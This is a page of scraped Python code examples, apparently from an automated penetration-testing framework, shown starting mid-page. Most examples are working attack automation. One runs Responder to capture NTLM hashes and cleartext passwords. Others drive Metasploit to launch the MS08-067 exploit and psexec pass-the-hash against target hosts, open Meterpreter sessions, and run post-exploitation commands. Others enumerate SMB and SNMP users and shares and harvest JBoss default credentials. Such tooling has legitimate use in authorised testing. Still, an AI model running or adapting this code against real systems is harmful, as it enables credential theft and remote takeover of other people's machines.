        return
Exemple #32
0
    def process(self):
        default_interface = self.config["responder_iface"]
        default_delay = self.config["responder_delay"]
        #responder_path = self.config["responder_path"]
        my_ip = self.config["lhost"]

        # TODO
        # check to see if we got any creds 
        # if not, wait 5 minutes and run again for 15 minutes
        # Extract usernames from results and add to KB
        found_hash = False
        times_run = 0
        #while not found_hash and times_run < 4:
        self.display.output("Starting responder...")
        temp_file1 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
        temp_file2 = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
        command = "python " + self.config["responder"] + " -I " + default_interface + " -i " + my_ip + " -wrf"
        # run for 15 minutes
        start_time = '{:%d-%m-%Y %H:%M:%S}'.format(datetime.datetime.now())
        result = Utils.execWait(command, temp_file1, timeout=int(self.config["responder_timeout"]))
        responder_path, temp1 = os.path.split(self.config["responder"])
        responder_db = responder_path + "/Responder.db"
        #STDOUT unreliable, grabbed hashes directly from the DB instead
        command = self.config["sqlite3"] + " " + responder_db + " \"select * from responder where timestamp > '" + start_time + "'\""
        result = Utils.execWait(command, temp_file2, timeout=10)
        times_run += 1
        #Have to account for responder not creating a new db file if nothing was found
        if not "no such table" in result:
            for part in result.splitlines():
                found_hash = True #Found a hash, set to true to prevent loop
                record = part.split('|')
                if len(record) > 0:
                    method = record[1]
                    hashtype = record[2]
                    host = record[3]
                    username = record[5]
                    domain = username.split('\\')[0]
                    user = username.split('\\')[1]
                    cleartext = record[6]
                    shorthash = record[7]
                    fullhash = record[8]
                    self.display.error("Vuln [NetBIOS|LLMNR] Found new hash - ", fullhash)
                    self.addVuln(host, "NetBIOS|LLMNR", {"port": "445", "output": temp_file2.replace("/", "%2F")})
                    kb.add("domain/" + domain + "/" + user + "/" + hashtype + "/" + fullhash)
                    if len(cleartext) > 0:
                        kb.add("creds/host/" + host + "/port/445/service/smb/username/" + user + "/password/" + cleartext)

            #if not found_hash:
            #    time.sleep(300) # sleep for 5 minutes

        # repeat upto 5 4 times
        if found_hash:
            self.fire("newNTLMHash")
        return
Exemple #33
0
    def processPort(self, host, port):
        state = port.find('state').attrib['state']
        if state == "open":
            portnum = port.attrib['portid']
            proto = port.attrib['protocol']
            kb.add('port/' + proto + '/' + portnum + '/' + host)
            EventHandler.fire("newPort_" + proto + '_' + portnum + ":" + self.vector)

            self.processService(host, portnum, proto, port.find('service'))
    
            for script in port.findall('script'):
                self.portScriptFunc (host, portnum, proto, script, self.outfile)
Exemple #34
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'],
                        port=self.config['msfport'],
                        user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " +
                                         t)
                    msf.execute("use exploit/windows/smb/ms08_067_netapi\n")
                    msf.execute("set TARGET 0\n")
                    # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
                    # msf.execute("set LHOST %s\n" % self.config['lhost'])
                    # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
                    # msf.execute("set LPORT 4444\n")
                    msf.execute("set RPORT 445\n")
                    msf.execute("set RHOST " + t + "\n")
                    msf.execute("set SMBPIPE BROWSER\n")
                    msf.execute("exploit -j\n")
                    msf.sleep(int(self.config['msfexploitdelay']))

                    outfile = self.config[
                        "proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
                            10)
                    result = msf.getResult()
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" +
                           outfile.replace("/", "%2F"))

                    parts = re.findall(".*Meterpreter session (\d+) opened.*",
                                       result)
                    for part in parts:
                        self.fire("msfSession")
                        self.display.verbose("NEW session on : " + t)
                        kb.add("host/" + t + "/msfSession/" + str(part))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #35
0
    def processPort(self, host, port):
        state = port.find('state').attrib['state']
        if state == "open":
            portnum = port.attrib['portid']
            proto = port.attrib['protocol']
            kb.add('port/' + proto + '/' + portnum + '/' + host)
            EventHandler.fire("newPort_" + proto + '_' + portnum + ":" +
                              self.vector)

            self.processService(host, portnum, proto, port.find('service'))

            for script in port.findall('script'):
                self.portScriptFunc(host, portnum, proto, script, self.outfile)
Exemple #36
0
    def processService(self, host, port, proto, vector):
        product = self.nm[host][proto][port]["product"]
        version = self.nm[host][proto][port]["version"]
        name = self.nm[host][proto][port]["name"]

        kb.add('service/' + name + '/host/' + host + '/' + proto + 'port/' + str(
            port) + '/product' + product + '/version/' + str(version))
        # print  'service/' + name + '/host/' + host + '/' + proto + 'port/' + str(port) + '/product' + product +
        # '/version/' + str(version)
        EventHandler.fire("newService" + str(name) + ":" + vector)
        if ("script" in self.nm[host][proto][port]):
            self.processScript(host, port, proto, vector)
        return
Exemple #37
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                temp_file = self.config["proofsDir"] + Utils.getRandStr(10)

                # run nmap
                n = mynmap(self.config, self.diaplay)
                scan_results = n.run(target=t,
                                     flags="-sS -A",
                                     vector=self.vector)['scan']

                # loop over scan results and do anything you need
                #     fire any new triggers that are needed
                #     self.fire("TEST123")
                for host in scan_results.keys():
                    # loop over each proto and process it
                    for proto in ['tcp', 'udp']:
                        if (proto in scan_results[host]):
                            # loop over each proto and process it
                            for port in scan_results[host][proto].keys():
                                # only worry about open ports
                                if (scan_results[host][proto][port]["state"] ==
                                        "open"):
                                    # fire event for "newPortXXX"
                                    self.fire("newPort" + str(port))
                                    kb.add(
                                        'host/' + host + '/' + proto + 'port',
                                        port)
                                    # process services and info
                                    s = scan_results[host][proto][port]
                                    # print "%s - %i/%s (%s) \"%s %s\" [%s]" % (host, port, proto, s['name'],
                                    # s['product'], s['version'], s['extrainfo'])
                                    if (s['name'] == 'http') or (s['name']
                                                                 == 'https'):
                                        self.fire('web')
                                    # check for any scripts and loop over them
                                    if ('script' in scan_results[host][proto]
                                        [port].keys()):
                                        for script in scan_results[host][
                                                proto][port]['script'].keys():
                                            a = 1
                                            # print "     %s - [[%s]]" % (script, scan_results[host][proto][port][
                                            # 'script'][script])
        return
Exemple #38
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'],
                            port=self.config['msfport'],
                            user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("getuid\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("sysinfo\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                    10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName +
                                   "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #39
0
    def processIPs(self, vector):
        for host in self.nm.all_hosts():
            # print host
            kb.add('host/' + host)
            # fire new event for "newHost"
            EventHandler.fire("newIP" + ":" + vector)

            # process ports
            self.processPorts(host, vector)

            # process hostscripts
            if ("hostscript" in self.nm[host]):
                self.processHostScripts(host, vector)
        return
Exemple #40
0
    def processPorts(self, host, vector):
        for proto in self.nm[host].all_protocols():
            lport = list(self.nm[host][proto].keys())
            lport.sort()
            for port in lport:
                if (self.nm[host][proto][port]["state"] == "open"):
                    # fire event for "newPortXXX"
                    kb.add('host/' + host + '/' + proto + 'port/' + str(port))
                    # print  'host/' + host + '/' + proto + 'port/' + str(port)
                    EventHandler.fire("newPort" + str(port) + ":" + vector)

                    # process services and info
                    self.processService(host, port, proto, vector)
        return
Exemple #41
0
 def processHost(self, host):
     ip = ""
     for addr in host.findall('address'):
         ip_tmp = addr.attrib['addr']
         addrType = addr.attrib['addrtype']
         if addrType == "ipv4":
             ip = ip_tmp
             kb.add('host/' + ip)
             EventHandler.fire("newIP" + ":" + self.vector)
     if host.find('hostname'):
         for hostname in host.find('hostnames').findall('hostname'):
             name = hostname.attrib['name']
             kb.add('host/' + ip + '/dns/' + name)
     return ip
Exemple #42
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                users = self.getUsers(t)
                for user in users:
                    hashes = kb.get ("creds/host/" + t + "/username/" + user + "/fullhash")
                    for passhash in hashes:
                        # verify we have not tested this host before
                        if not self.seentarget(t+user+passhash):
                            # add the new IP to the already seen list
                            self.addseentarget(t+user+passhash)
                            myMsf.lock.acquire()
                            self.display.verbose(self.shortName + " - Connecting to " + t)
                            msf.execute("use exploit/windows/smb/psexec\n")
                            msf.execute("set RPORT 445\n")
                            msf.execute("set RHOST " + t + "\n")
                            msf.execute("set SMBUser " + user + "\n")
                            msf.execute("set SMBPass " + passhash + "\n")
                            msf.execute("exploit -j\n")
                            msf.sleep(int(self.config['msfexploitdelay']))
        
                            outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                            result = msf.getResult()
                            myMsf.lock.release()
                            Utils.writeFile(result, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
        
                            parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                            for part in parts:
                                self.fire("msfSession")
                                self.display.verbose("NEW session on : " + t)
                                kb.add("shell/" + t + "/msf/" + str(part))
        
            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #43
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
                    for comString in comStrings:
                        myMsf.lock.acquire()
                        msf.execute("use auxiliary/scanner/snmp/snmp_enumshares\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is None):
                            result = result + msf.getResult()
                        myMsf.lock.release()

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                        #  Don't need to parse out IP, we are running module one IP at a time
                        # Just find lines with  -  and pull out share name
                        parts = re.findall(".* - .*", result)
                        for part in parts:
                            sharename = (part.split('-')[0]).strip()
                            kb.add("share/smb/" + t + "/" + sharename)

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #44
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        for t in self.targets:
            sessions = kb.get('host/' + t + '/msfSession')

            if len(sessions) > 0:
                # connect to msfrpc
                msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                            password=self.config['msfpass'])

                if msf.isAuthenticated():
                    # loop over each target
                    for s in sessions:
                        # verify we have not tested this session before
                        if not self.seentarget(s):
                            # add the new IP to the already seen list
                            self.addseentarget(s)
                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("getuid\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                            msf.execute("sessions -i " + str(s) + "\n")
                            msf.execute("sysinfo\n")
                            msf.execute("background\n")

                            # TODO - process results and store dat to KB
                            outfile = self.config[
                                          "proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
                                10)
                            text = msf.getResult()
                            Utils.writeFile(text, outfile)
                            kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #45
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use exploit/windows/smb/ms08_067_netapi\n")
                    msf.execute("set TARGET 0\n")
                    # msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
                    # msf.execute("set LHOST %s\n" % self.config['lhost'])
                    # msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
                    # msf.execute("set LPORT 4444\n")
                    msf.execute("set RPORT 445\n")
                    msf.execute("set RHOST " + t + "\n")
                    msf.execute("set SMBPIPE BROWSER\n")
                    msf.execute("exploit -j\n")
                    msf.sleep(int(self.config['msfexploitdelay']))

                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    result = msf.getResult()
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                    parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
                    for part in parts:
                        self.fire("msfSession")
                        self.display.verbose("NEW session on : " + t)
                        kb.add("host/" + t + "/msfSession/" + str(part))

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #46
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    # Get list of working community strings for this host
                    comStrings = kb.get("host/" + t + "/vuln/snmpCred/communityString")
                    for comString in comStrings:
                        msf.execute("use auxiliary/scanner/snmp/snmp_enumusers\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set COMMUNITY %s\n" % comString)
                        msf.execute("run\n")
                        msf.sleep(int(self.config['msfexploitdelay']))
                        result = msf.getResult()
                        while (re.search(".*execution completed.*", result) is None):
                            result = result + msf.getResult()

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

                        # Extract usernames from results and add to KB
                        parts = re.findall(".* users: .*", result)
                        for part in parts:
                            userlist = (part.split(':')[2]).split(',')
                            for username in userlist:
                                kb.add("host/" + t + "/user/" + username.strip())

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #47
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'], password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                ports = kb.get('service/http/' + t + '/tcp')
                for p in ports:
                    # verify we have not tested this host before
                    if not self.seentarget(t+p):
                        # add the new IP to the already seen list
                        self.addseentarget(t+p)
                        myMsf.lock.acquire()
                        self.display.verbose(self.shortName + " - Connecting to " + t)
                        msf.execute("use auxiliary/scanner/http/jboss_vulnscan\n")
                        msf.execute("set RHOSTS %s\n" % t)
                        msf.execute("set RPORT %s\n" % p)
                        msf.execute("exploit\n")
                        msf.sleep(int(self.config['msfexploitdelay']))

                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        result = msf.getResult()
                        myMsf.lock.release()
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"    ))
                        for line in result.splitlines():
                            m = re.match(r'.*Authenticated using (.*):(.*)', line)
                            if (m):
                                self.display.error("Jboss on [" + t + ":" + p + "] has default creds of [" +
                                        m.group(1).strip() +"]/[" + m.group(2).strip() + "]")
                                kb.add("creds/service/jboss/" + t + "/port/" + p + "/username/"
                                        + m.group(1).strip() + "/password/" + m.group(2).strip())
                                self.fire("newJbossPassword")

            # clean up after ourselves
            result = msf.cleanup()

        return
Exemple #48
0
 def myProcessHostScript(self, host, script, outfile):
     outfile = outfile + ".xml"
     scriptid = script.attrib['id']
     output = script.attrib['output']
     if (scriptid == "smb-enum-shares"):
         for volumes in script.findall("table"):
             for volume in volumes:
                 readAccess = False
                 writeAccess = False
                 sharename = ""
                 sharetype = ""
                 sharecomment = ""
                 anonaccess = ""
                 useraccess = ""
 
                 files = {}
                 sharename = volume.attrib["key"]
                 for elem in volume:
                     if elem.attrib["key"] == "Type":
                         sharetype = elem.text.replace("/", "%2F")
                     if elem.attrib["key"] == "Comment":
                         sharecomment = elem.text.replace("/", "%2F")
                     elif elem.attrib["key"] == "Anonymous access":
                         rights = elem[0].text
                         if "READ" in rights:
                             readAccess = True
                         if "WRITE" in rights:
                             writeAccess = True
                         anonaccess = rights.replace("/", "%2F")
                     elif elem.attrib["key"] == "Current user access":
                         rights = elem[0].text
                         if "READ" in rights:
                             readAccess = True
                         if "WRITE" in rights:
                             writeAccess = True
                         useraccess = rights.replace("/", "%2F")
                 kb.add("share/smb/" + sharename + "/" + host + "/" + str("Info: " + anonaccess))
 
             if readAccess:
                 self.addVuln(host, "smb-read", {"port": "445", "output": outfile.replace("/", "%2F")})
                 self.fire("nfsRead")
             if writeAccess:
                 self.addVuln(host, "smb-write", {"port": "445", "output": outfile.replace("/", "%2F")})
                 self.fire("nfsWrite")
Exemple #49
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                temp_file = self.config["proofsDir"] + Utils.getRandStr(10)

                # run nmap
                n = mynmap(self.config, self.diaplay)
                scan_results = n.run(target=t, flags="-sS -A", vector=self.vector)['scan']

                # loop over scan results and do anything you need
                #     fire any new triggers that are needed
                #     self.fire("TEST123")
                for host in scan_results.keys():
                    # loop over each proto and process it
                    for proto in ['tcp', 'udp']:
                        if (proto in scan_results[host]):
                            # loop over each proto and process it
                            for port in scan_results[host][proto].keys():
                                # only worry about open ports
                                if (scan_results[host][proto][port]["state"] == "open"):
                                    # fire event for "newPortXXX"
                                    self.fire("newPort" + str(port))
                                    kb.add('host/' + host + '/' + proto + 'port', port)
                                    # process services and info
                                    s = scan_results[host][proto][port]
                                    # print "%s - %i/%s (%s) \"%s %s\" [%s]" % (host, port, proto, s['name'],
                                    # s['product'], s['version'], s['extrainfo'])
                                    if (s['name'] == 'http') or (s['name'] == 'https'):
                                        self.fire('web')
                                    # check for any scripts and loop over them
                                    if ('script' in scan_results[host][proto][port].keys()):
                                        for script in scan_results[host][proto][port]['script'].keys():
                                            a = 1
                                            # print "     %s - [[%s]]" % (script, scan_results[host][proto][port][
                                            # 'script'][script])
        return
Exemple #50
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # loop over each target
            for t in self.targets:
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    cstrings = kb.get("vuln/host/" + t + "/snmpCred/communityString")
                    for community in cstrings:
                        command = self.config["snmpwalk"] + " -v 2c -c " + community + " " + t
                        result = command + "\n" + Utils.execWait(command) #append command to top of output
                        outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                        Utils.writeFile(result, outfile)
                        kb.add("host/" + t + "/vuln/snmpCred/output/" + outfile.replace("/", "%2F"))

        return
Exemple #51
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            ports = kb.get('service/ftp/' + t + '/tcp')
            for p in ports:
                self.testTarget(t, p)
        return
Exemple #52
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                self.display.verbose(self.shortName + " - Connecting to " + t)
                try:
                    results = socket.gethostbyaddr(t)
                    self.fire("newHostname")
                    kb.add('host/' + t + '/hostname/' + results[0])
                except:
                    pass

        return
Exemple #53
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        # loop over each target
        for t in self.targets:
            # verify we have not tested this host before
            if not self.seentarget(t):
                # add the new IP to the already seen list
                self.addseentarget(t)
                self.display.verbose(self.shortName + " - Connecting to " + t)
                # run nmap
                n = mynmap(self.config, self.display)
                scan_results = n.run(target=t, flags="--script=nfs-ls,nfs-showmount", ports="111", vector=self.vector,
                                     filetag=t + "_NFSSHARESCAN")['scan']

                tree = ET.parse(n.outfile + '.xml')
                root = tree.getroot()
                for volumestable in root.iter("table"):
                    if volumestable.attrib.has_key('key') and volumestable.attrib['key'] == "volumes":
                        for volume in volumestable:
                            sharename = ""
                            shareinfo = ""
                            files = {}
                            for elem in volume:
                                if elem.attrib["key"] == "volume":
                                    sharename = elem.text.replace("/", "%2F")
                                if elem.attrib["key"] == "info":
                                    shareinfo = elem[0].text.replace("/", "%2F")
                                if elem.attrib["key"] == "files":
                                    for file in elem:
                                        newfile = {}
                                        for fileprop in file:
                                            newfile[fileprop.attrib["key"]] = fileprop.text
                                        files[newfile["filename"]] = newfile
                            kb.add("host/" + t + "/shares/NFS/" + sharename + "/" + str("Info: " + shareinfo))
                            for file in files:
                                # TODO - Maybe revisit adding more file properties here in addition to names
                                kb.add("host/" + t + "/shares/NFS/" + sharename + "/Files/" + str(file).replace("/", "%2F"))
                                
        return
Exemple #54
0
    def myProcessPortScript(self, host, proto, port, script, outfile):
        outfile = outfile + ".xml"
        scriptid = script.attrib['id']
        output = script.attrib['output']
        if (scriptid == "nfs-ls"):
            readAccess = False
            writeAccess = False
            for volumes in script.findall("table"):
                for volume in volumes.findall("table"):
                    sharename = ""
                    shareinfo = ""
                    files = {}
                    for elem in volume:
                        if elem.attrib["key"] == "volume":
                            sharename = elem.text.replace("/", "%2F")
                        if elem.attrib["key"] == "info":
                            rights = elem[0].text
                            if "Read" in rights:
                                readAccess = True
                            if "Modify" in rights:
                                writeAccess = True
                            shareinfo = rights.replace("/", "%2F")
                        if elem.attrib["key"] == "files":
                            for file in elem:
                                newfile = {}
                                for fileprop in file:
                                    newfile[fileprop.attrib["key"]] = fileprop.text
                                files[newfile["filename"]] = newfile
                    kb.add("share/nfs/" + host + "/" + sharename + "/" + str("Info: " + shareinfo))
#                    for file in files:
#                        # TODO - Maybe revisit adding more file properties here in addition to names
#                        kb.add("host/" + host + "/shares/NFS/" + sharename + "/Files/" + str(file).replace("/", "%2F"))
#                        print ("host/" + host + "/shares/NFS/" + sharename + "/Files/" + str(file).replace("/", "%2F"))

            if readAccess:
                self.addVuln(host, "nfs-read", {"port": "111", "output": outfile.replace("/", "%2F")})
                self.fire("nfsRead")
            if writeAccess:
                self.addVuln(host, "nfs-write", {"port": "111", "output": outfile.replace("/", "%2F")})
                self.fire("nfsWrite")
Exemple #55
0
    def processTarget(self, t, port):
        if not self.seentarget(t + str(port)):
            self.addseentarget(t + str(port))
            self.display.verbose(self.shortName + " - Connecting to " + t)
            try:
                conn = httplib.HTTPConnection(t, port, timeout=10)

                conn.request('GET', '/')
                response = conn.getresponse()
                serverver = response.getheader('server')
                if (serverver):
                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
                        port) + "_" + Utils.getRandStr(10)
                    Utils.writeFile("Identified Server Version of %s : %s\n\nFull Headers:\n%s" % (
                        t, serverver, self.print_dict(response.getheaders())), outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            except httplib.BadStatusLine:
                pass
            # except socket.error as e:
            except:
                pass
Exemple #56
0
    def process(self):
        # load any targets we are interested in
        self.getTargets()

        if len(self.targets) > 0:
            # connect to msfrpc
            msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
                        password=self.config['msfpass'])

            if not msf.isAuthenticated():
                return

            # loop over each target
            for t in self.targets:
                # verify we have not tested this host before
                if not self.seentarget(t):
                    # add the new IP to the already seen list
                    self.addseentarget(t)
                    self.display.verbose(self.shortName + " - Connecting to " + t)
                    msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
                    msf.execute("set RHOSTS %s\n" % t)
                    msf.execute("run\n")
                    # msf.sleep(int(self.config['msfexploitdelay']))
                    result = msf.getResult()
                    while (re.search(".*execution completed.*", result) is None):
                        result = result + msf.getResult()

                    # TODO - process results and store user list to KB
                    # need to do something better with this.
                    #    loop over each user and store in the KB
                    #        if local, store in "/host/" + t + "/user/" + user
                    #        if domain, store in "/domain/" + domainname + "/user/" + user

                    # for now, just print out the results
                    # MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
                    parts = re.findall(".*" + t.replace(".", "\.") + ".*", result)
                    for part in parts:
                        if "RHOSTS" in part:
                            pass
                        else:
                            try:
                                pieces = part.split()
                                domain = pieces[3]
                                kb.add("domain/" + domain.strip() + "/host/" + t)
                                extras = part.split('(')[1].split(')')[0]
                                users = part.split('[')[3].split(']')[0].split(',')
                                for user in users:
                                    kb.add("host/" + t + "/user/" + user.strip())
                            except:
                                pass
                    outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
                    Utils.writeFile(result, outfile)
                    kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))

            # clean up after ourselves
            result = msf.cleanup()

        return